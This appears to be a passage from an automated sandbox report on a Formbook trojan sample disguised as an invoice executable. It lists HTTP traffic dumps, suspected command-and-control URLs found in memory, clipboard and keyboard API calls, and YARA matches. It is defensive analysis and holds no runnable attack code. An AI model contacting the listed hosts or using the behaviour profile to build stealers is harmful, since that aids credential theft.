            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 16 Sep 2024 07:32:05 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</s
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 16 Sep 2024 07:32:07 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</s
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 16 Sep 2024 07:32:10 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</s
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 16 Sep 2024 07:32:13 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404">
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 16 Sep 2024 07:32:18 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://newdaydawning.net/wp-json/>; rel="https://api.w.org/"Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 36 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 0d 0a 37 65 0d 0a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 20 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 0d 0a Data Ascii: 16<!doctype html><html 7elang="en-US" prefix="og: https://ogp.me/ns#" ><head><link rel="profile" href="https://gmpg.org/xfn/11"><meta charset="
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 16 Sep 2024 07:32:23 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://newdaydawning.net/wp-json/>; rel="https://api.w.org/"Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 36 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 0d 0a 37 65 0d 0a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 20 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 0d 0a Data Ascii: 16<!doctype html><html 7elang="en-US" prefix="og: https://ogp.me/ns#" ><head><link rel="profile" href="https://gmpg.org/xfn/11"><meta charset="
            Source: TapiUnattend.exe, 00000006.00000002.4151512701.0000000004984000.00000004.10000000.00040000.00000000.sdmp, bJWYsPIiPtg.exe, 00000007.00000002.4150963531.00000000039C4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://newdaydawning.net/72tr/?4RLhs=7BJLM4eH&h2Pt9=QZWebiUhaLdmwus6tw46di6RDKjv7nbCBMEilCJ9bJwWpmwj
            Source: bJWYsPIiPtg.exe, 00000007.00000002.4150699714.00000000025CA000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.wajf.net
            Source: bJWYsPIiPtg.exe, 00000007.00000002.4150699714.00000000025CA000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.wajf.net/zl4r/
            Source: TapiUnattend.exe, 00000006.00000002.4153244006.0000000007C2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: TapiUnattend.exe, 00000006.00000002.4153244006.0000000007C2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: TapiUnattend.exe, 00000006.00000002.4153244006.0000000007C2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: TapiUnattend.exe, 00000006.00000002.4153244006.0000000007C2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: TapiUnattend.exe, 00000006.00000002.4151512701.0000000004660000.00000004.10000000.00040000.00000000.sdmp, bJWYsPIiPtg.exe, 00000007.00000002.4150963531.00000000036A0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://contacts.zoho.com/static/file?t=org&ID=456089&fs=thumb
            Source: TapiUnattend.exe, 00000006.00000002.4153244006.0000000007C2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: TapiUnattend.exe, 00000006.00000002.4153244006.0000000007C2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: TapiUnattend.exe, 00000006.00000002.4153244006.0000000007C2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: TapiUnattend.exe, 00000006.00000002.4151512701.00000000047F2000.00000004.10000000.00040000.00000000.sdmp, bJWYsPIiPtg.exe, 00000007.00000002.4150963531.0000000003832000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
            Source: TapiUnattend.exe, 00000006.00000002.4149956479.0000000002E9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: TapiUnattend.exe, 00000006.00000002.4149956479.0000000002E9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: TapiUnattend.exe, 00000006.00000002.4149956479.0000000002E9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: TapiUnattend.exe, 00000006.00000002.4149956479.0000000002E9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: TapiUnattend.exe, 00000006.00000002.4149956479.0000000002E9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: TapiUnattend.exe, 00000006.00000002.4149956479.0000000002E9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: TapiUnattend.exe, 00000006.00000003.2320633515.0000000007C0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: TapiUnattend.exe, 00000006.00000002.4153244006.0000000007C2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: TapiUnattend.exe, 00000006.00000002.4151512701.0000000004660000.00000004.10000000.00040000.00000000.sdmp, bJWYsPIiPtg.exe, 00000007.00000002.4150963531.00000000036A0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.zoho.com/sites/?src=parkeddomain&dr=www.lanxuanz.tech
            Source: TapiUnattend.exe, 00000006.00000002.4151512701.0000000004660000.00000004.10000000.00040000.00000000.sdmp, bJWYsPIiPtg.exe, 00000007.00000002.4150963531.00000000036A0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.zoho.com/sites/images/professionally-crafted-themes.png
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_0037EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0037EAFF
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_0037ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0037ED6A
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_0037EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0037EAFF
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_0036AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_0036AA57
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_00399576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00399576

            E-Banking Fraud

            barindex
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.4149796746.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4149856590.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2117687090.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4150699714.0000000002570000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4149551530.00000000028E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2118026660.0000000003AD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4150549424.00000000039C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2118406683.0000000005600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4149796746.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4149856590.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.2117687090.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.4150699714.0000000002570000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4149551530.00000000028E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.2118026660.0000000003AD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.4150549424.00000000039C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.2118406683.0000000005600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
